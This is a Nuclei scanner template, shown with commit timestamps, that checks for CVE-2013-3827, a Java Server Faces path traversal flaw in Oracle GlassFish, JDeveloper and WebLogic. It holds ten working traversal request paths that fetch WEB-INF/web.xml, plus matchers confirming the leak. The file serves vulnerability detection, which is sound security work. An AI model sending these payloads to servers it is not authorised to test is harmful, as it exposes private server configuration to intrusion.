nuclei-templates/http/cves/2013/CVE-2013-3827.yaml

49 lines
2.1 KiB
YAML
Raw Normal View History

2021-06-30 10:50:41 +00:00
id: CVE-2013-3827
info:
2021-07-17 16:14:56 +00:00
name: Javafaces LFI
2021-06-30 10:50:41 +00:00
author: Random-Robbie
severity: medium
description: An Unspecified vulnerability in the Oracle GlassFish Server component in Oracle Fusion Middleware 2.1.1, 3.0.1, and 3.1.2; the Oracle JDeveloper component in Oracle Fusion Middleware 11.1.2.3.0, 11.1.2.4.0, and 12.1.2.0.0; and the Oracle WebLogic Server component in Oracle Fusion Middleware 10.3.6.0 and 12.1.1 allows remote attackers to affect confidentiality via unknown vectors related to Java Server Faces or Web Container.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2013-3827
- https://www.exploit-db.com/exploits/38802
- https://www.oracle.com/security-alerts/cpuoct2013.html
- http://www.oracle.com/technetwork/topics/security/cpuoct2013-1899837.html
classification:
2022-09-06 01:33:31 +00:00
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N
cvss-score: 5
cve-id: CVE-2013-3827
2022-09-06 01:33:31 +00:00
cwe-id: NVD-CWE-noinfo
tags: edb,cve,cve2013,lfi,javafaces,oracle
2021-06-30 10:50:41 +00:00
http:
2021-06-30 10:50:41 +00:00
- method: GET
path:
- "{{BaseURL}}/costModule/faces/javax.faces.resource/web.xml?loc=../WEB-INF"
- "{{BaseURL}}/costModule/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.."
- "{{BaseURL}}/faces/javax.faces.resource/web.xml?loc=../WEB-INF"
- "{{BaseURL}}/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.."
- "{{BaseURL}}/secureader/javax.faces.resource/web.xml?loc=../WEB-INF"
- "{{BaseURL}}/secureader/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.."
- "{{BaseURL}}/myaccount/javax.faces.resource/web.xml?loc=../WEB-INF"
- "{{BaseURL}}/myaccount/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.."
- "{{BaseURL}}/SupportPortlet/faces/javax.faces.resource/web.xml?loc=../WEB-INF"
- "{{BaseURL}}/SupportPortlet/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.."
2021-07-17 16:14:56 +00:00
stop-at-first-match: true
2021-06-30 10:50:41 +00:00
matchers-condition: and
matchers:
- type: word
words:
2021-07-17 16:14:56 +00:00
- "<web-app"
- "</web-app>"
2021-06-30 10:50:41 +00:00
part: body
2021-07-17 16:14:56 +00:00
condition: and
- type: status
status:
- 200
# Enhanced by mp on 2022/02/23